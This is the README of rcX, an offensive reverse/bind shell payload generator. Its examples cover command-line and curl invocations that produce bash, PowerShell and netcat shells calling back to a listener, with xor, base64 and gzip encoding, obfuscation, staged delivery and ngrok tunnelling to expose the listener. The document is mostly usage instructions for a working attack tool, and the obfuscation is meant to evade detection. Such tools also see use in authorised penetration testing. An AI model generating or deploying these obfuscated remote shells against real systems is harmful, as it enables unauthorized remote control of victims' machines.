FlyfishSec / rcX

A powerful reverse shell generator

Home Page:https://rcxonline.cf

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Build Python 2.7|3.x GitHub release GitHub downloads License

rcX

curl

rcX

What is rcX?

"rc" - stands for remote command or remote code.

"X" - you can understand as assistant or tool.

The predecessor of rcX is rsGen(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator. More features will be added in the future.

rcX

Local use

pip install -r requirements.txt or Download the packaged binaries

CLI Usage

Example:

1.Get a bash reverse shell and output in tabular format.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table rcX

2.Custom shell path.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"

3.Copy the specified id payload to the clipboard.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5

4.Get a base64 encoded bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64

5.Get a xor encoded and obfuscated bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7 rcX

6.Get a staging bash reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0 rcX

7.Get a staging bash reverse shell and forward local port using ngrok tunnel.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp

8.Get a Windows Powershell reverse shell.

python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows

...

Web UI

At the same time, rcX also provides a web interface. Use rcX as a server then you can use it with your team or friends.

Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end

Example:

python rcX.py -w

Web CLI

When rcX is running as a server, you can use curl in terminal to get the payload.

Example:

1.Get a bash reverse shell payload

curl http://127.0.0.1/linux/bash/127.0.0.4/8888 rcX

2.Base64 encoded

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64

3.Base64 and hex encoded

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex

4.Gzip compress and replace_char(obfuscation method)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char

5.xor encoded and reverse(obfuscation method)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse

6.Get a Windows powershell reverse shell payload

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444

7.replace_char(obfuscation method) only without using encoder

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char

8.Only use staging, without any encoder and obfuscator

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1

9.Get a bind linux netcat shell payload

curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888

Support rcX

Bitcoin Address QR Code Ethereum Address QR Code Monero Address QR Code DOGECOIN Address QR Code

BTC: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF

ETH: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED

XMR: 48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi

Dogecoin: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if

About

A powerful reverse shell generator

https://rcxonline.cf

License:GNU General Public License v2.0


Languages

Language:Python 91.0%Language:HTML 9.0%